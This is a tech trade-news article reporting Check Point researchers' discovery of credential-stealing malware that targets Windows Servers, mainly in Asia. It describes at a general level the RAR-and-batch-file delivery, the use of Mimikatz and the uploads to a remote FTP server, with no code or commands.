Menu
Check Point: new malware found in Windows Servers

Check Point: new malware found in Windows Servers

Malware only targets Windows Servers and not Windows PCs or laptops

A new malware has been discovered by technical researchers from Check Point Software that specifically targets Microsoft Windows Servers, the vendor has revealed in a blog post.

It is believed the malware only targets Windows Servers and not Windows PCs or laptops, which aims to steal data residing within such servers and upload the data to a remote FTP server.

The discovery was made by three technical researchers from Check Point Software, Arle Olshtein, Moshe Hayun, and Arnold Osipov.

“During our research, we came across an attack targeting Windows servers in APAC and revealed the attackers infrastructure, where we observed the uploading of sensitive data, such as Windows login credentials, OS version and IP addresses (internal and external) from between 3-10 different victims each second,” said the blog post announcing the discovery.

Similar to the recent WinRAR vulnerability which was also discovered by Check Point researchers, this newly discovered malware was found to also be a .RAR compressed file.

This compressed file was found to be hiding several batch files that effectively triggers the malware, checks the identity of the machines to ensure that it is a server running Microsoft Windows Server, on the assumption that servers would likely host commercial or institutional sensitive data.

“We observed a batch file with an evasive behaviour using interesting techniques such as “Squiblydoo”, “download cradle” and WMI Event Subscription persistence exploit to run malicious content on infected machines,” said the blog post.

“The malware conceals the malicious behaviour as legitimate Windows processes to evade AV detection,” added the post. “Currently, VirusTotal shows a very low positivity rate among many AV products.”

The researchers found that the malicious campaign targets mainly countries in Asia and uses the open-source utility Mimikatz, which facilitates the viewing of credential information from the Windows local security authority subsystem service (Isass) through its sekurlsa module.

The Mimikatz utility is used by the attacker to steal sensitive information from Windows servers, and uploads this stolen data to an FTP server.

As the researchers have noted, that at the time of writing, the ftp server is still open and data is continuously uploaded (stolen) every second.


Follow Us

Join the newsletter!

Or

Sign up to gain exclusive access to email subscriptions, event invitations, competitions, giveaways, and much more.

Membership is free, and your security and privacy remain protected. View our privacy policy before signing up.

Error: Please check your email address.

Tags Microsoftmalwarecheck point software

Events

Why experience is the new battleground for partners

Join us for an exclusive webinar, in association with Hewlett Packard Enterprise and Technology Services Industry Association (TSIA) and learn about the latest industry insights and how technology services continue to evolve to deliver differentiated value, and how partners can be successful in 2021 and beyond.

Featured

Slideshows

The Kiwi channel gathers for the 2020 Reseller News Women in ICT Awards

The Kiwi channel gathers for the 2020 Reseller News Women in ICT Awards

Hundreds of leaders from the New Zealand IT industry gathered at the Hilton in Auckland on 17 November to celebrate the finest female talent in the Kiwi channel and recognise the winners of the Reseller News Women in ICT Awards (WIICTA) 2020.

The Kiwi channel gathers for the 2020 Reseller News Women in ICT Awards
Leading female front runners honoured at the 2020 Reseller News Women in ICT Awards

Leading female front runners honoured at the 2020 Reseller News Women in ICT Awards

The leading female front runners of the New Zealand ICT industry joined together for the annual Reseller News Women in ICT Awards event at the Hilton in Auckland, during which hundreds of guests celebrated 13 outstanding individuals who won awards, chosen from more than 50 finalists representing over 30 organisations.

Leading female front runners honoured at the 2020 Reseller News Women in ICT Awards
Channel gathers to celebrate the Reseller News Innovation Awards 2020 winners

Channel gathers to celebrate the Reseller News Innovation Awards 2020 winners

More than 500 channel leaders gathered in Auckland on 21 October at the ​Reseller News Innovation Awards ​2020 to celebrate the achievements of the New Zealand technology industry's top partners, start-ups, vendors, distributors and individuals.

Channel gathers to celebrate the Reseller News Innovation Awards 2020 winners
Show Comments